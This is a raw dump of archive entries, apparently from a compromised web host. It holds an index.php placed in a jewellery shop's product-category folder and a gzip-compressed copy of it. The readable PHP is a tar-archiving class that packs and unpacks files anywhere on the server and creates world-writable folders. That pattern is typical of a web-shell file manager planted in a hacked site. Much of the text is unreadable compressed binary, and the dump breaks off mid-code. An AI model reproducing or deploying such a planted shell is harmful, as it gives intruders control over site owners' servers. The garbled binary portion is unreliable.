tasslihorec sfaxoistadet bintestcss PKGBi[|>> index.php.tarnu[home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php000077700000233524151040117760022623 0ustar00tasslihorec sfaxoistadet bintestcss <\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } PKGBi[v5occindex.php.php.tar.gznu[z"I(xnUWRP }e A<:D@,lsӧ\E?\b900n̔+b*/x[,VcE}K5ET>ԮOdek/_P8 ES0 X0GP,fB')?8UßRVMFOAxU??~BcOoLΌc'2YY ]4A7I֘ᔓ&<$݇t +Ivi$7Kߥ(O =s].Y$x<[@EWyhe:T>'F-ԗKj_HKFU(ciK l6H5#M!;|z9x|蟩_.>~aIw_/s@YpmF+23/Hr)񛡌FQB!7ԥ ODkYɰ 0?9h͋«hP@֦Dm5`|^6 n44n Ih,QS5Y*)éȨQxK#(<^U̲^ƨ}!hq"~/BF>DכҁUD+7oPW|uoRrSWoЇ&0sGߜ ]hQ/XdQxMfD\i> Ys ]ʊrR " R4EF ib5 M~1VeOl'؊ƏHO (-RPBcF ; hs0Q #+Ty#&"@SN.KM-yQ y ~o1S&N+0ߑxGϺ t^@7p(Q]d% 0 $ MQAPbMOVeWH7<Z47KC}-ǿzUDݪ5/o=:&rUP~ȣJq%lxB}'#(Y!d~!0p8" $C|x r1hWI T>@S9 FGŸ|B*2d=ۃWk| ~,) sxs):gģ G0%MR۹^F'jvA뫇E(£wy 0ZHF3b: ꙋEl7(@sR+g]"K4k^n$qр /?HIn2Ax|)f̉*[V' n4:$ $вC#~!bPQgi CJM.J #DOt2< UrT{p^T>1-el ޥY*'-HbrPъ:gӤI}"%]Ӡ`,0N4@)Ba$ M4$UϖJ|B;&lx Rح~{:݁v%9%1E` QcW1|o~vݷt6_*j.'͠7Y'.j;$zib72 2$q9Ra7d[,sk/?DdBiFH!"dEp'.9y?i c ↨S XstO-sN~b7̉2ƒ77l*Sڀq?+~H͡C=Mx&W"cU"hS}܍㓕/- Z<5/ NEjk.$ZDBwA5/d$H TT(b KץυGӋ03[=j՗N5ʦz*ek@w,)6gB !cIVDIDF1Y5^d> 7t=QB%;'qUVl^Ϻ$ ^Ș,c+ Ih۠T2Fޠ2ɸ"]H|D%brʿ2m6xT|$$cٖ<),G"kRڂvB-( #͝&, &?ENq~ Ts |ΨK~I'k#`P{F YB`Yc;5A hP*Ԙv`f4,Ӣd6J65lA@Ru\^ll AnS6eQ39AS107g v!қ"WZ @o?Л@To"M|odEj ~7S QDzcj{J{xKYy- eHB[4b3KnD|I [kW#*X2!MS5@ڢälWĨ!!՚SS淂'J\Lyq$9A]ʪM0!,P- j.Q/ f0ۻ%-"=qcuѯK*o]OFv Glj'+31ڰfǼr;e]᥉6a.xN /\E]=8vȼ*4|"JO53XcyK6X>R1:c^FRxiiL 1h4@_ ]AB8ƠJ$aPUF9( L$a;* 9"izsPs8Z3;y V\rM눚QN'+)4MU$z@AEˆvE>Pһ S)eҿ9(Oͺq/~m[܆G<)Xd!xMzę!mhd&R)P\|V>^8Ώb|)lRJh9Ķڧ8V7pi.C:qFk5 .sב"t\"]"@`C/ dF æ<בᇌ/_@} ]!hIh@h " )T1}МcV5nDM 9'o&mҩ@ $S LD=u; EɀޒYjCՒ=PnA=|g|`bd-xcc:}%NS(J5 1FiDSb }W^Wr{I]~Kv8L#L~%jJa&KX3i#ݹN-p3BS+?*<,T֟$rpB?H1kp 5 zЩ'-A-]wGsMLv f;=M `i>DvnPYT.]2C $Z)l8CX]/~S= tq@7^"43;dQ,uizZ2՛{BIG!.-~^ս+OAw7=[Ȓ*#= @ŁW KŒ5D"Ԛ=:J/KCH|ⅇ5)˙NPz"!^fyPQ[ IjFlZme/C$ ogI8qҐh'* oUE6>0t8ghQjh?0O#tE;NqK.[;LhNwA gQ,p]'\j `";eGg'ƛVI9W1~v!v )HW :Md<[^`C[y8#G}BEoDH_,SF*O.׍=5^s.]*r0.[o5W.u$$1f4 8W#^.o/(nsA^C#mL3Jˮȝf䦠<=A"5B $a7{p1 AF+2~)rgJmn +]W6Sh'q=B1I_ 5GE+$A^ȏ"׬ 9R?Z_ ~ xZ;[ޙ>"w]ρ-3!L)F`Sf;2†m5,_Mc,9޵KIZN1YMT%\VB+EjdNë LpҶʲnCxZ?~K]MSH(,X}(GkBXL^,gCYv4]LZ )J;y;@c0" Dnrk5 B WOʢ0̉$8Rc2$$ >׼& ,'>T!@d&TF$ ,@@CF3%،qy$2D0M~kaC'D[&wإ4%CZs('rU[i3AOxM7G+d2QɧeTK+voEZnbG_m]لΆU6L=  2.['BL|՚~i >پ:jx'wN&-"ʯS[E7,^òٸeZ lf&/kྷԥru*S$5^ۇ4=QyGwAy;&Ntaa;䪤o&]@}vݐ=K6!-oX.V6\^9:\=40@gm?KAz廽QKpAL AA,E4;/nwOTu|ې;joԴOt}7.QgQ|xA v"S)rŎ<n1z/^6ϻn*Xrf>ovgݒ'\ՇU}\)b{\/\e[=-TaN:3ZPC0?Gk[zJv9V w6-~(y3Mn9U7> ܆vz):0zfe#>f9m* o37>0<4;Ѽ2L&8g4ެ#0-1R p>D&g2ú>jGm .G#|6C[A 1湍ae5^ 6 bC cvX]bq'4pa!f3(#wEnc3ڏ z{KEdFvU+{XHobY+ZQ*u Yx^k:v$иW/Z)s/f];b3s'Ҵc;=`^@^!cx}6.9lh 'r4x3DZ|Nufmbs2lv K#;x|x p"L@:,aY_.yt%4b!+n#wm{fR{M0:@:+X޺|_]>W K1BIo7%:h0[Ay5#4¡,|qeqÃd|!O*BEFp)cu⺷ .ȸW >w9 c17`F&**r",8DW٠Wᢙ<6O8~#1٬~Ժ"BQ`\C0 }.DmV&:ϞhHǓi*5`б i)u_kj?_Գ\jdU#~bo[ؗ ^ddߌdĚ:x@Up9jxu͋_}9zI]M|H%0&w>14 oGH `2h%ӥ̨Ov,Nqm*ͺcX?_aEtM%Fr0c!U1zk7"ScsH–^p4=0u; d1kII}꼷c oߙ1v0Ar]8(YXFaOR}}PlmX LLvn\_9ol/0:n6srw aSGs/wWV3!f.Mkѥ*qY3`CYocfN.GW5)䲿1yit.8Bc2t!f$7;slRK{ ,gJO)""9]q@M+ʅXT_Snr۠`5{̇#aP_^0j !xaj<7_D8V.um|dX3,o<PFiԈhN.p@ku!m'H`p œ70ȣLvcZL|kgP$46]O #136dǁWʧ8t|n+ X@,K̼^J_f:3.uw#θU[+= F |4KtYF8MFT3{ϱiNeT!jo#VHCRƊ8D9'kP3~+hͅEϢ.Z_-W1TĈ%ctMB "g;,L=q UG] n wCa34c4i$D 2h D')P1`܌`;mq&F)۵o`皶֍gf&u8YU l];́5e>k? wNqK߃~9\=^>J[ӹvMb]xC3[\l|~874&jzQ{۫i&rO9NL4d'Z6 w7ntZ+@q1}~8ѥ&F1OЏ $<,@Bk #am3QY=vAh pkÃHN?^&3Y䅏!OLQ3 zq?b?yn}3;?e 7tT>|vx]#.h DK] <("8m@[B&Q iChU/l<46ԚGi3 bvrg>vF47rW <4PΛ)/YvJh*?~J+?ٌ?T;tH&p ;cg1Ż=q5a9'  .5wCkXFHG2X,װ(Լw3׼bŒh8` `Z(Ñ«A-;;+]|?D &Ǜ%d1:&0ʹQQ7hkS|yooTEq9h (nؘc@&a3/Q bsEs|8 -sY-6Z(%cPO(ᚁJ*B3Ǒ,f 7X1s9ff,(v= )˒oƤ`h6 ҇%~.仦C?y&g݌塮: sfFe>c?_]78hoq`qMNs`A*IS͕3A;U[/ p8nf[!-ug) Y![U1o e0lv:bBZm&g ݼ+Pz-žm=f(%5}3|M:ݳvXt/O3y{Zɖҝt> [DyENb UfBZK;hKّAw\m{ST~O, M:\h:ҹC7/+p1W˧]:=yDMY8jTU#R0hz6\,jD n3sesyF*qᡔ= lQv3GKbeleXa([OSVDְ/M A[aG PGoxIEٛ~֛n:mnxo#a:]/N9=MB.2LYoe;|6yc^eugYld2E)ftɌ,TfᱝmL3좕]! =BķGL+qa:oħHn4ϔ+Lғvu l2y^#aA!lzڙl;S*tKRr8)EmQ_h&]qnRqi;J7spQnɺѿolrI~X7J6!7VI=$'pMz}=?ȥZͪ퉚Wgx^P;e;]mMNH^»mI9m@ikF3)ʓ}ȏfr{ެJ6|uh C|Hek"*yꪯZy6OH\2E1eWzK|;EocղrH[;r՚Jb D}q{tBm AX^wz7Tlұ䙫wЧ#s@]/^9FMu:}m#SY aŲ.^Y~.*JB]vbw[^+_Mn"\閼gTc>[5Һe >:!~Y / vyyiX}e8Ql؛dC}5Wftض~3$ƃD{VӍXw*>#VSr[uzYQ*>P8rIoXu/,eom"*r\"- ]P ^>z[)[}ڕO\.Gj$. ]c2.恘"i}im5uZ }h-BSAMGx7X{ݯ&u)Teہ\oϭ4ƛBnTb~p!0XVB~r6WʨY[#H}/VR,Rlpi7ˣzwbh 6zHXGqy<[O>X/5ftgQo+z#RiUgeoX7ZЛEwoY겏D6+Du-B8PeKlrΆ6Jl'&biS{[AB|03+gf73QZyW5}82X=ңitQl‘LJF(L@\}7>hǚ|xIDTՖ] U*Y+VO(=)/&ZVzuUkeXzBqBpsͺUXneeZRk~]jM^2øjYI6ZWiOVU+PLTm&VjOi_+\g?ZW|a ]J>jy?mi_ K)v8TۧXE%x1~ⵆ+q6V[NW#}O*" j|4QjyԊˡe_TrTmH-GB9ʬ6 n;ֺQ^+?*n<+QPb՟ c~= zvpf7RSz2m awX;?+nן$D%snF@n|j`r/Vs( >.UtNQ!t^  k|5%+h9`_kGq56`Dž$<.h ^_vH̅{n=u>D~di^GepI2=/b7P[kKB=\I;H;٘^Kk);1Zc;tlXv'n<]x8چr2Qo{}BfC:q|]l"lq_{sαz"Ʋe_!R[xWH (Q^6a6)>NE.@c5.nN+GoXʠjF3Ǔ W_]+xDIA9twF>1Y,\}{vU(frSG~9NC䶻MJH VfWeP]]r oUղs)tv!xikd5<*^cK;&Ѣ0Ʈ*oixp1T0S[HĶ(yqu~ӥE@gi!V4%qIObrҜxxXu! ki6Dr?[ 2+HH?d$/FzS )6@h폤6\HJң .KmK~w+waQMW%jU~^eݟRpn&QI+q%ehd3w 0ޭM}pyge¡Ds\ioRZ*5oWİw@v>N`\f@`qyͷ΂e4>^r&_Nf4;~쪱-75OB$$#j>ij" bZ,ͧx,ysP4y5myiﴞjQ^}ޖEe3^gHi !&70+?zb\f!~8^E֑`/M&Ӗ(Oݢ6c/&_BN|қNO%?'榻n+ O]1KݲAw>pnb~.҂U 5aT`JH X^{!OCAWCVUed4>/jY7yJ}L-XZwvlsm-Jjb̮̂RsCkz 6Xv<0PM|(#i׏1&v&DfүP#ò1?Gq26 5cH¢?b:$2I&(v~Zcۖ1%ƹz"zWQWÑ-j\H:dJåUrXStU/z;+¦4%*W>W"J*}bX>΍.Y:ծ#^% y*,+Qx?*&p|U{/)M" WfX⪦LiMNgl2 Vi%ŇVF+ͧi*>|X6f[!V漕ju vc ? nEx'z |nH9*csfYxo~`*L_L Va4~A=5á( ?4NP-OBB] Y''*G|92SWhg}=^ll{bkYbvWS,o-&WbVI~F JY43@r9Zl=l@ԙRXfO͔cRMjO`%:bLOz/b+nrLhy.KRqP j LZ{E彜.﹙+56iatӭ5lTJ ~$p:Tx^1 nKPoc9l}/(%z Ea`_Usf^975PZ*LǧtOW X&u^"sՕp}_ߒ,Q7ȇ738* :RoiQH.ŌswQ/F zZ p!Zzg م1hĤw:FTl^/X . {: #9Ž8 cr*q _b1"vy|.g~l"PFAy˵kR^l)? oIB,7L\:~a0:buPX #PICNxr91l ΪgF,H;8۝fq,Ӄ8g>Nh6$^ (z'7㇯ag} GvFװj(vF5?U. A.:67^xüڣ|mm@M|,|e$ @@G!n7#*Yd(PJ;ն޹S]A `Bo] yeGL(CI;bO=}r>?pwQ@>#\tʷ{u0g)~'B'a@G0wbf w9G/Z;䩀l?kAy\Mdա",_a\f0Ʋy!u^A:E#G[_ET;׏PH­cs$9Z*QMj\gJ6$?=}CZ-E|[~JTwwSZ}=;6lJ˨bS)B%*LCp*>.'w80m܍)o&H`Owƨd+3X*alTѠ-Th5Ci"`,` c>9(çpb 2uT`-Ba3XA.mA2Zhha2ip!FOmfzdD!X,YL)+@0$}flGi7 g! {e8=u=VF/.:We ѭ! Cw8yV6[`D-5ŅexIko̗k:O¥WW/?aL~@ߣFCmlhR_2?KE9AvߝD'WHڭpE6d &K/".@U 8 |`ߦ1afJX$Ґ]<X+[ R[gL1[`H1s(Xw"DL$=l?%~#3h Nqܶ5qAWr8=Ww8/q+gF}?& iGG?"$ !l"l!\ ڃE矬cfMD:ٵ6^>6Y ++!:_yFL; c#E)t*sNr2C/"chRxt?ݝ{i;7f/esg'k=3ߘOq$i|x\t637mkƁ(Nľe?_MF2>G6H* LQ4ndl1\Z[$_ ?/9f0"^ Kaw\߰Yk.I:)GH)TgxqέA+_ْDOs2`2|!y)Դ&Uϫ(Z8|!W$YCAnZNB\΋v'7R 䈞hw}1G9}tbZ?}:|x,RNh5{։_?%/"Ԣ\s0AK )8*Ħʺ?q2?)KDjD\Hq"'?eLM/0?uuqD6(#`mŮ lʴ!A6;J:43> ;qBjY*?sWȧЦ궾rR ]7806ǟdQC\϶[=lq: f|NUF"P]_gv̺ݓ%SC%i44NqwFeBEN3lY u\z'DsKeo|s-6KWU7@)}KyP|M$;-ۇ x1x,r;V$AֲeY捕ukycoȇ^/}Nڛ |G'7)2+}II$@=M,ݶ<OChӇjLG9N<b.'_w2$xfŽ|V xVypL5u dōfxz]0Dc鐘i鷀T7liSĆCm/ަgAӂiI iisTLpQ*]׆~|R6k'vyۨ98=6Kω@e4sic0uZE#@ 1۝YGkuS吅wV}CepD;b/X3Ypo0Z0nDDDžNЌH[DŽb~ÿaq8I :`@#HGsy_㐥,Lē _\m3;YgT>l8 m_2Ct,X 9Y!5EbX^~/BȐv6!XY'|ptыV\Gl nrhǫ'-i) IJ֊5'Op(pcYkb jK|_\Ky/JcHH"fS_\"E$!dvd^R3 txB#vH =FҞ t9*+wyfVL<ߡ!ǹ&L6n^so؎YRWc#?y$b'0cXx!fAJߺb^n¶/ D&ο pU:!1Z!vIa<4!%z;Uþ^/wbrD9Z{?!X#b|w`ol!쩰?[7j0*+ԘFwb3lrak:Yw17z%zN6hQd5O6'lg$ڮ(|"yd#a}p^M2g\ R[e=zKJ5NEIρh506N1n{8Q7i8,lNҩ-TRpݲ]\b 37\=5&Cz/4Lʢs@D. _ošh`N"78$_5(CFLJ~™4 ~~/qءs@I 0D; j8  ;9ao<,'n|85y mKh d:ԂCյø'HvT`Z_BhF.a!ce@d)0PըQV$ݏNkhѺ7` Z57G[?ϒ%opF&$$fqTRZ0UTxp>LR ^ `¸ s\3\P/=+Zl;ݧ^ Gx2fsq!˕jzP8I/{G]4 }L} >ǀO%7c C|d~D6e^Cхn]fi-ZPcHHD"hp =t ;|DߘѭԔ`0E驇 2)4{ -nxh &C;0B`1*x8# @ 32"FRL I 3)dŠiA#-LV)&\(*:BtAeceT"/@&݃ =@ǐC |C+z%xOA5:fq9ֿ F"qJ:`[|1G~ncMj(+,sg 69lȩKʍ:_B*k$㱀:sIklQ@+ ƿ ee¶l3<"$(aן2 ,$}D?7(O2ܑ'AJqo#G<`DaeEE!Gi1GIH_X_>.x4@k~ k.f_6on8T]N\w41 |LzV\(N8؂̩# g@N|VՅYUU~^~u~k1,HT!p_Bqm;$η kmQit[eeA=C!?~AB}b >yP^l%/ow/H2WK'..4*j۴-'5ԪN[+nLR2tTppOdP6/JƲ5΁#;`&?H^@F<s_pg H0ߥ~ l8*;a~?K4bڥ&/jVtI#{?fϋNuI15G%׸Vm^K՚̩"aRD#r^k62׈S8ڽ9&cj߾ؘgcqi ZXwb]9,_Q/W ^U wyCut`lp5WbP%ӂϸ{APqV cz!EI8VI)j`Љq[GOx6 q}LJ$0"DU5; wDR?eB5*U i'vM+M t'HWB 8⽒.&?lJ/Vk\Ov,7n;C(8L6[_ |.<6>YQGuľu77G-\ZD{uToF$6c,8qsqr1vݖmHogSx.`bwdž[ 5]3)'|Cm,~m v5d뺦s9)DwppBvƒO RvB"\;N[\=0䨾yX8•\A1Ǣg&zJLwC45{Byx)ǜ9vqY:) mKno|L,AQn$Eüqg_?ndL: Xtx`6MC  ւzOMr|{(BsϚm,rZ6,iˆ2~cF3AQ 8x Ug-?&$MD@T5GpK] uRBOL[Gx*ql2k3'Z5܄zR=<=x5Z+OsƏ7 聯5l:9;CuMNh![0kUMmLAO/C]1s7)h**eI/a:unmU-| ꬇A$sj Np zhfx{mp:Bi?V=)bxRXu9m֩EP_n qbp!âs Bk $ oded.AJ$0Z4v |䣊8$&zH..fB8#4Qd}! 3FY(XG,[par!z!Mhs#~fBIV!1v{cbQj9~a^X&!a ֜I1h@հ#̱zq1$ºRϹ*hey 1P0i .!$E<|Y갺1ߨo;`R|e*T$Ϋ/ݾgP73' AWH>.Bhqh3y%8Nbp6(gx[v0wL2DzDY8bi4ԃ&%?[A+mD.AnןAQCcw cĢ*A[6i@W#6UYa8 fS/|AjZym#pg2liظSI RԢ3w4pny/c1.,8\!]Tf)"<GxQ@AxՉR*=#z|f#9s1MFg5cImt :&Ll=]yW(cT!Cqcdt8Y5%`f"o;q0ǪWJ(9</(Z[-vkY~0ss-yep-nQsEq9уĉYa 76N~.s9dɯcuȎJ[1| Ǔ.ЛArl<5'e> r|ƵwG$L}4$ Wk\o!l*$`fpL1nߨoz0R.Y ev#ոIⰞr@|?iY$5l3:p{Nyr|i84۫:)nF9*㛜ԩԨ&l ]H׎ jT7Sl ~Wwt{tqηݞfD|i)5pӊe7A0.pBn[m}>퉅?'] >PKGBi[|,T7T7 index.phpnutasslihorec sfaxoistadet bintestcss <\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while 